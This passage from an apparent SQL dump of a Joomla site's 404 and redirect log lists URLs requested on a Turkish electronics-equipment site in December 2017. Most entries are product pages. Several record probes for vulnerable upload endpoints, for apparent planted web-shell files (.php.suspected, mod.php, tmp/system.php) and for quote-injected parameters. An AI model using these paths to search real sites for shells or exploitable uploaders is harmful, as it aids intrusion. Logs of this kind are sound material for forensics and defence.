00:00:00',301),(16395,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,mf_name/results,1-5',NULL,'','',5,0,'2017-12-17 05:24:49','0000-00-00 00:00:00',301),(16396,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/dirdesc/results,1-50',NULL,'','',6,0,'2017-12-17 05:45:10','0000-00-00 00:00:00',301),(16397,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,category_name/dirdesc',NULL,'','',8,0,'2017-12-17 06:05:30','0000-00-00 00:00:00',301),(16398,'http://www.3s-technologies.com.tr/tr/hakkä±mä±zda',NULL,'','',14,0,'2017-12-17 07:20:25','0000-00-00 00:00:00',301),(16399,'http://3s-technologies.com.tr/tr/index.php?option=com_myblog&task=ajaxupload',NULL,'http://3s-technologies.com.tr/tr/index.php?option=com_myblog&task=ajaxupload','',17,0,'2017-12-17 07:39:26','0000-00-00 00:00:00',301),(16400,'http://www.3s-technologies.com.tr/en/products/spartan-8s-8d-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-17 08:04:58','0000-00-00 00:00:00',301),(16401,'http://3s-technologies.com.tr/en/?option=com_myblog&task=ajaxupload',NULL,'http://3s-technologies.com.tr/index.php?option=com_myblog&task=ajaxupload','',19,0,'2017-12-17 10:19:21','0000-00-00 00:00:00',301),(16402,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_name/dirdesc',NULL,'','',1,0,'2017-12-17 10:31:27','0000-00-00 00:00:00',301),(16403,'http://3s-technologies.com.tr/tr/libraries/joomla/base/content-post.php',NULL,'http://site.ru','',3,0,'2017-12-17 13:19:03','0000-00-00 00:00:00',301),(16404,'http://3s-technologies.com.tr/tr/modules/header_img.php.suspected',NULL,'http://site.ru','',2,0,'2017-12-17 13:20:07','0000-00-00 00:00:00',301),(16405,'http://3s-technologies.com.tr/tr/headers_img.php.suspected',NULL,'http://site.ru','',4,0,'2017-12-17 13:29:34','0000-00-00 00:00:00',301),(16406,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,mf_name',NULL,'','',1,0,'2017-12-17 13:33:00','0000-00-00 00:00:00',301),(16407,'http://3s-technologies.com.tr/tr/logs/logs.php',NULL,'http://site.ru','',9,0,'2017-12-17 14:08:32','0000-00-00 00:00:00',301),(16408,'http://3s-technologies.com.tr/tr/tmp/system.php',NULL,'http://site.ru','',3,0,'2017-12-17 14:08:33','0000-00-00 00:00:00',301),(16409,'http://3s-technologies.com.tr/tr/components/com_banners/models/mod.php',NULL,'http://site.ru','',10,0,'2017-12-17 15:41:17','0000-00-00 00:00:00',301),(16410,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_checkin/vtmfyij.php.suspected',NULL,'http://site.ru','',2,0,'2017-12-17 15:41:21','0000-00-00 00:00:00',301),(16411,'http://3s-technologies.com.tr/tr/robotobum.ru/tmp/system_infos.php',NULL,'http://site.ru','',1,0,'2017-12-17 15:41:39','0000-00-00 00:00:00',301),(16412,'http://3s-technologies.com.tr/tr/components/com_contact/contact.lib.php',NULL,'http://site.ru','',5,0,'2017-12-17 15:43:12','0000-00-00 00:00:00',301),(16413,'http://3s-technologies.com.tr/index.php/en/products/mx200lp-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-17 15:44:30','0000-00-00 00:00:00',301),(16414,'http://3s-technologies.com.tr/tr/media/mod.php',NULL,'http://site.ru','',24,0,'2017-12-17 16:11:57','0000-00-00 00:00:00',301),(16415,'http://3s-technologies.com.tr/tr/administrator/help/vsqhc.php.suspected',NULL,'http://site.ru','',3,0,'2017-12-17 16:14:57','0000-00-00 00:00:00',301),(16416,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,ordering',NULL,'','',1,0,'2017-12-17 16:17:38','0000-00-00 00:00:00',301),(16417,'http://3s-technologies.com.tr/tr/wp-updats.php.suspected',NULL,'http://site.ru','',8,0,'2017-12-17 16:41:11','0000-00-00 00:00:00',301),(16418,'http://3s-technologies.com.tr/tr/modules/logo_img.php.suspected',NULL,'http://site.ru','',3,0,'2017-12-17 17:53:31','0000-00-00 00:00:00',301),(16419,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hä±z/by,product_name/dirdesc',NULL,'','',1,0,'2017-12-17 18:09:59','0000-00-00 00:00:00',301),(16420,'http://3s-technologies.com.tr/tr/modules/mod.php',NULL,'http://site.ru','',6,0,'2017-12-17 18:14:49','0000-00-00 00:00:00',301),(16421,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_name',NULL,'','',2,0,'2017-12-17 18:39:57','0000-00-00 00:00:00',301),(16422,'http://3s-technologies.com.tr/tr/modules/mod_svit_manufacturers/sucjde.php.suspected',NULL,'http://site.ru','',3,0,'2017-12-17 18:45:36','0000-00-00 00:00:00',301),(16423,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-12-17 19:41:48','0000-00-00 00:00:00',301),(16424,'http://3s-technologies.com.tr/tr/media/headers_img.php.suspected',NULL,'http://site.ru','',2,0,'2017-12-17 20:17:33','0000-00-00 00:00:00',301),(16425,'http://3s-technologies.com.tr/tr/tmp/config.php',NULL,'http://site.ru','',2,0,'2017-12-17 20:48:23','0000-00-00 00:00:00',301),(16426,'http://3s-technologies.com.tr/tr/plugins/xsxaoc.php.suspected',NULL,'http://site.ru','',2,0,'2017-12-17 22:00:46','0000-00-00 00:00:00',301),(16427,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-17 23:13:26','0000-00-00 00:00:00',301),(16428,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hä±z/by,product_sku',NULL,'','',2,0,'2017-12-17 23:15:02','0000-00-00 00:00:00',301),(16429,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-18 01:03:11','0000-00-00 00:00:00',301),(16430,'http://3s-technologies.com.tr/tr/components/com_b2jcontact',NULL,'','',8,0,'2017-12-18 03:41:11','0000-00-00 00:00:00',301),(16431,'http://3s-technologies.com.tr/tr/templates/atomic/cutia.php',NULL,'http://site.ru','',1,0,'2017-12-18 04:23:53','0000-00-00 00:00:00',301),(16432,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',24,0,'2017-12-18 04:47:32','0000-00-00 00:00:00',301),(16433,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız?language=en-gb',NULL,'','',2,0,'2017-12-18 05:55:00','0000-00-00 00:00:00',301),(16434,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/mirae',NULL,'','',5,0,'2017-12-18 06:17:23','0000-00-00 00:00:00',301),(16435,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hã„â±z/npm-detail',NULL,'','',9,0,'2017-12-18 06:25:43','0000-00-00 00:00:00',301),(16436,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,mf_name/dirdesc',NULL,'','',2,0,'2017-12-18 06:28:07','0000-00-00 00:00:00',301),(16437,'http://www.3s-technologies.com.tr/en/assets/modules/evogallery/js/uploadify/uploadify.css',NULL,'http://www.3s-technologies.com.tr/assets/modules/evogallery/js/uploadify/uploadify.css','',4,0,'2017-12-18 08:52:25','0000-00-00 00:00:00',301),(16438,'http://www.3s-technologies.com.tr/tr/urunler/smd-fä±rä±n/by,mf_name',NULL,'','',2,0,'2017-12-18 09:11:38','0000-00-00 00:00:00',301),(16439,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/dirdesc?language=en-gb',NULL,'','',23,0,'2017-12-18 13:00:09','0000-00-00 00:00:00',301),(16440,'http://www.3s-technologies.com.tr/tr/tmp/sfx.php',NULL,'','',1,0,'2017-12-18 13:35:45','0000-00-00 00:00:00',301),(16441,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hä±z/by,product_sku',NULL,'','',2,0,'2017-12-18 17:01:08','0000-00-00 00:00:00',301),(16442,'http://www.3s-technologies.com.tr/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',2,0,'2017-12-19 01:33:09','0000-00-00 00:00:00',301),(16443,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/results,1-5',NULL,'','',6,0,'2017-12-19 05:22:57','0000-00-00 00:00:00',301),(16444,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic/home-page-atomic/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',24,0,'2017-12-19 08:40:28','0000-00-00 00:00:00',301),(16445,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail/askquestion?tmpl=component',NULL,'','',6,0,'2017-12-19 10:01:23','0000-00-00 00:00:00',301),(16446,'http://www.3s-technologies.com.tr/tr/images/ddm/reflow ovens/spartan_8s.gif',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/dalga-lehim/spartan-8s-8d-44-detail','',66,0,'2017-12-19 10:19:12','0000-00-00 00:00:00',301),(16447,'http://3s-technologies.com.tr/index.php/tr/ueruenler/ly-8c-detail?tmpl=component&print=1',NULL,'','',6,0,'2017-12-19 12:10:13','0000-00-00 00:00:00',301),(16448,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_sku/results,1-5',NULL,'','',5,0,'2017-12-19 13:18:50','0000-00-00 00:00:00',301),(16449,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,category_name',NULL,'','',1,0,'2017-12-19 13:57:04','0000-00-00 00:00:00',301),(16450,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/php-event-calendar/readme.txt',NULL,'','',1,0,'2017-12-19 14:10:58','0000-00-00 00:00:00',301),(16451,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_sku/results,1-10',NULL,'','',1,0,'2017-12-19 14:32:57','0000-00-00 00:00:00',301),(16452,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/dirdesc/results,1-50',NULL,'','',2,0,'2017-12-19 15:57:39','0000-00-00 00:00:00',301),(16453,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,category_name',NULL,'','',1,0,'2017-12-19 18:11:40','0000-00-00 00:00:00',301),(16454,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,`p`.product_sku',NULL,'','',1,0,'2017-12-19 19:04:21','0000-00-00 00:00:00',301),(16455,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-19 20:40:56','0000-00-00 00:00:00',301),(16456,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-19 22:43:51','0000-00-00 00:00:00',301),(16457,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-19 23:37:05','0000-00-00 00:00:00',301),(16458,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-20 00:17:58','0000-00-00 00:00:00',301),(16459,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-20 01:46:39','0000-00-00 00:00:00',301),(16460,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/t_pb3_s_250x250.jpg',NULL,'','',2,0,'2017-12-20 05:58:22','0000-00-00 00:00:00',301),(16461,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/dirdesc/results,1-5',NULL,'','',3,0,'2017-12-20 07:49:54','0000-00-00 00:00:00',301),(16462,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/by,product_sku?language=tr-tr',NULL,'','',22,0,'2017-12-20 09:24:28','0000-00-00 00:00:00',301),(16463,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hä±z/by,mf_name',NULL,'','',2,0,'2017-12-20 09:40:13','0000-00-00 00:00:00',301),(16464,'http://www.3s-technologies.com.tr/en/administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_simplephotogallery/lib/uploadFile.php','',5,0,'2017-12-20 11:01:53','0000-00-00 00:00:00',301),(16465,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',22,0,'2017-12-20 13:05:07','0000-00-00 00:00:00',301),(16466,'http://www.3s-technologies.com.tr/tr/\'/templates/beez5/images/plus.png',NULL,'','',10410,0,'2017-12-20 13:26:50','0000-00-00 00:00:00',301),(16467,'http://www.3s-technologies.com.tr/tr/\'/templates/beez5/images/minus.png',NULL,'','',10408,0,'2017-12-20 13:26:50','0000-00-00 00:00:00',301),(16468,'http://www.3s-technologies.com.tr/tr/hakk',NULL,'','',23,0,'2017-12-20 13:27:33','0000-00-00 00:00:00',301),(16469,'http://www.3s-technologies.com.tr/tr/images/mirae/1226656899.jpg',NULL,'','',21,0,'2017-12-20 13:28:21','0000-00-00 00:00:00',301),(16470,'http://www.3s-technologies.com.tr/tr/?r?nler/manufacturer/ddm-novastar/smd-f?r?n/by,pc.ordering,product_name?language=tr-tr',NULL,'','',1,0,'2017-12-20 13:44:14','0000-00-00 00:00:00',301),(16471,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-20 15:08:47','0000-00-00 00:00:00',301),(16472,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler',NULL,'','',9,0,'2017-12-20 15:30:21','0000-00-00 00:00:00',301),(16473,'http://www.3s-technologies.com.tr/tr/components/com_b2jcontact/b2jcontact.php',NULL,'','',2,0,'2017-12-20 15:30:38','0000-00-00 00:00:00',301),(16474,'http://www.3s-technologies.com.tr/tr/joomla/components/com_b2jcontact/b2jcontact.php',NULL,'','',1,0,'2017-12-20 15:30:38','0000-00-00 00:00:00',301),(16475,'http://3s-technologies.com.tr/en/user',NULL,'','',8,0,'2017-12-20 21:34:22','0000-00-00 00:00:00',301),(16476,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&itemid=137&lang=tr',NULL,'','',7,0,'2017-12-20 21:39:53','0000-00-00 00:00:00',301),(16477,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',1,0,'2017-12-20 21:58:01','0000-00-00 00:00:00',301),(16478,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri',NULL,'','',8,0,'2017-12-20 22:25:43','0000-00-00 00:00:00',301),(16479,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-21 01:11:00','0000-00-00 00:00:00',301),(16480,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=126&itemid=133',NULL,'','',13,0,'2017-12-21 01:42:23','0000-00-00 00:00:00',301),(16481,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=127&itemid=134',NULL,'','',13,0,'2017-12-21 01:42:27','0000-00-00 00:00:00',301),(16482,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku',NULL,'','',1,0,'2017-12-21 04:30:38','0000-00-00 00:00:00',301),(16483,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',1,0,'2017-12-21 04:34:00','0000-00-00 00:00:00',301),(16484,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name',NULL,'','',4,0,'2017-12-21 06:45:59','0000-00-00 00:00:00',301),(16485,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fä±rä±n',NULL,'','',1,0,'2017-12-21 06:46:17','0000-00-00 00:00:00',301),(16486,'http://www.3s-technologies.com.tr/tr/ueruenler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',1,0,'2017-12-21 06:46:30','0000-00-00 00:00:00',301),(16487,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',1,0,'2017-12-21 08:45:59','0000-00-00 00:00:00',301),(16488,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/ddm-novastar',NULL,'','',7,0,'2017-12-21 08:49:40','0000-00-00 00:00:00',301),(16489,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,ordering',NULL,'','',1,0,'2017-12-21 08:57:59','0000-00-00 00:00:00',301),(16490,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-40',NULL,'','',1,0,'2017-12-21 09:57:59','0000-00-00 00:00:00',301),(16491,'https://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-21 10:12:50','0000-00-00 00:00:00',301),(16492,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-10',NULL,'','',3,0,'2017-12-21 11:33:59','0000-00-00 00:00:00',301),(16493,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,product_name/dirdesc?language=en-gb',NULL,'','',6,0,'2017-12-21 12:28:11','0000-00-00 00:00:00',301),(16494,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/dirdesc/results,1-10',NULL,'','',6,0,'2017-12-21 13:09:58','0000-00-00 00:00:00',301),(16495,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-20',NULL,'','',1,0,'2017-12-21 13:22:00','0000-00-00 00:00:00',301),(16496,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/results,1-20',NULL,'','',1,0,'2017-12-21 16:01:02','0000-00-00 00:00:00',301),(16497,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name',NULL,'','',1,0,'2017-12-21 16:13:02','0000-00-00 00:00:00',301),(16498,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/dalga-lehim/by,`p`.product_sku',NULL,'','',1,0,'2017-12-21 16:21:32','0000-00-00 00:00:00',301),(16499,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-21 16:37:02','0000-00-00 00:00:00',301),(16500,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,ordering',NULL,'','',3,0,'2017-12-21 17:37:02','0000-00-00 00:00:00',301),(16501,'http://www.3s-technologies.com.tr/index.php?option=com_content\'a=0&view=article&id=64&itemid=86&lang=tr',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_content\'A=0&view=article&id=64&Itemid=86&lang=tr','',1,0,'2017-12-21 17:56:28','0000-00-00 00:00:00',301),(16502,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article\'a=0&id=64&itemid=86&lang=tr',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article\'A=0&id=64&Itemid=86&lang=tr','',1,0,'2017-12-21 17:56:28','0000-00-00 00:00:00',301),(16503,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/results,1-20',NULL,'','',1,0,'2017-12-21 18:13:02','0000-00-00 00:00:00',301),(16504,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',8,0,'2017-12-21 18:25:02','0000-00-00 00:00:00',301),(16505,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-10',NULL,'','',1,0,'2017-12-21 18:37:02','0000-00-00 00:00:00',301),(16506,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-40',NULL,'','',1,0,'2017-12-21 20:13:03','0000-00-00 00:00:00',301),(16507,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-100',NULL,'','',1,0,'2017-12-21 20:37:01','0000-00-00 00:00:00',301),(16508,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/results,1-50',NULL,'','',1,0,'2017-12-21 20:49:01','0000-00-00 00:00:00',301),(16509,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n',NULL,'','',7,0,'2017-12-21 22:25:01','0000-00-00 00:00:00',301),(16510,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&itemid=148&lang=en',NULL,'','',2,0,'2017-12-21 22:39:55','0000-00-00 00:00:00',301),(16511,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2017-12-21 23:55:34','0000-00-00 00:00:00',301),(16512,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/results,1-10',NULL,'','',1,0,'2017-12-22 00:17:23','0000-00-00 00:00:00',301),(16513,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±',NULL,'','',10,0,'2017-12-22 00:31:55','0000-00-00 00:00:00',301),(16514,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku',NULL,'','',1,0,'2017-12-22 01:11:55','0000-00-00 00:00:00',301),(16515,'http://3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.8mm-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-22 01:38:11','0000-00-00 00:00:00',301),(16516,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-100',NULL,'','',1,0,'2017-12-22 01:55:34','0000-00-00 00:00:00',301),(16517,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-10',NULL,'','',7,0,'2017-12-22 03:22:49','0000-00-00 00:00:00',301),(16518,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-12-22 03:33:44','0000-00-00 00:00:00',301),(16519,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,mf_name/results,1-50',NULL,'','',8,0,'2017-12-22 03:44:38','0000-00-00 00:00:00',301),(16520,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/panasonic',NULL,'','',5,0,'2017-12-22 05:21:17','0000-00-00 00:00:00',301),(16521,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',4,0,'2017-12-22 05:22:49','0000-00-00 00:00:00',301),(16522,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-20',NULL,'','',1,0,'2017-12-22 05:33:44','0000-00-00 00:00:00',301),(16523,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,mf_name/results,1-20',NULL,'','',1,0,'2017-12-22 05:44:38','0000-00-00 00:00:00',301),(16524,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-40',NULL,'','',4,0,'2017-12-22 06:50:05','0000-00-00 00:00:00',301),(16525,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri',NULL,'','',6,0,'2017-12-22 06:52:01','0000-00-00 00:00:00',301),(16526,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,pc.ordering,product_name/dirdesc',NULL,'','',5,0,'2017-12-22 07:22:49','0000-00-00 00:00:00',301),(16527,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,mf_name/results,1-10',NULL,'','',1,0,'2017-12-22 07:33:43','0000-00-00 00:00:00',301),(16528,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-22 07:44:37','0000-00-00 00:00:00',301),(16529,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-12-22 08:28:16','0000-00-00 00:00:00',301),(16530,'http://3s-technologies.com.tr/tr/joomla/images/pdf/r256.pdf',NULL,'','',9,0,'2017-12-22 08:35:12','0000-00-00 00:00:00',301),(16531,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,product_name?language=tr-tr',NULL,'','',23,0,'2017-12-22 09:06:16','0000-00-00 00:00:00',301),(16532,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-22 09:22:48','0000-00-00 00:00:00',301),(16533,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2017-12-22 10:06:26','0000-00-00 00:00:00',301),(16534,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name',NULL,'','',1,0,'2017-12-22 10:17:21','0000-00-00 00:00:00',301),(16535,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,mf_name/results,1-5',NULL,'','',4,0,'2017-12-22 10:50:05','0000-00-00 00:00:00',301),(16536,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/results,1-10',NULL,'','',1,0,'2017-12-22 11:11:53','0000-00-00 00:00:00',301),(16537,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name/dirdesc',NULL,'','',1,0,'2017-12-22 11:22:48','0000-00-00 00:00:00',301),(16538,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-22 11:33:42','0000-00-00 00:00:00',301),(16539,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_name',NULL,'','',1,0,'2017-12-22 11:44:37','0000-00-00 00:00:00',301),(16540,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/results,1-20',NULL,'','',4,0,'2017-12-22 13:00:59','0000-00-00 00:00:00',301),(16541,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name/results,1-5',NULL,'','',1,0,'2017-12-22 13:33:43','0000-00-00 00:00:00',301),(16542,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-22 13:44:36','0000-00-00 00:00:00',301),(16543,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-22 14:50:05','0000-00-00 00:00:00',301),(16544,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/results,1-40',NULL,'','',1,0,'2017-12-22 15:11:54','0000-00-00 00:00:00',301),(16545,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name/results,1-5',NULL,'','',1,0,'2017-12-22 15:22:47','0000-00-00 00:00:00',301),(16546,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-22 15:27:44','0000-00-00 00:00:00',301),(16547,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-22 15:33:42','0000-00-00 00:00:00',301),(16548,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,pc.ordering,product_name',NULL,'','',1,0,'2017-12-22 15:44:36','0000-00-00 00:00:00',301),(16549,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name/results,1-20',NULL,'','',1,0,'2017-12-22 16:39:09','0000-00-00 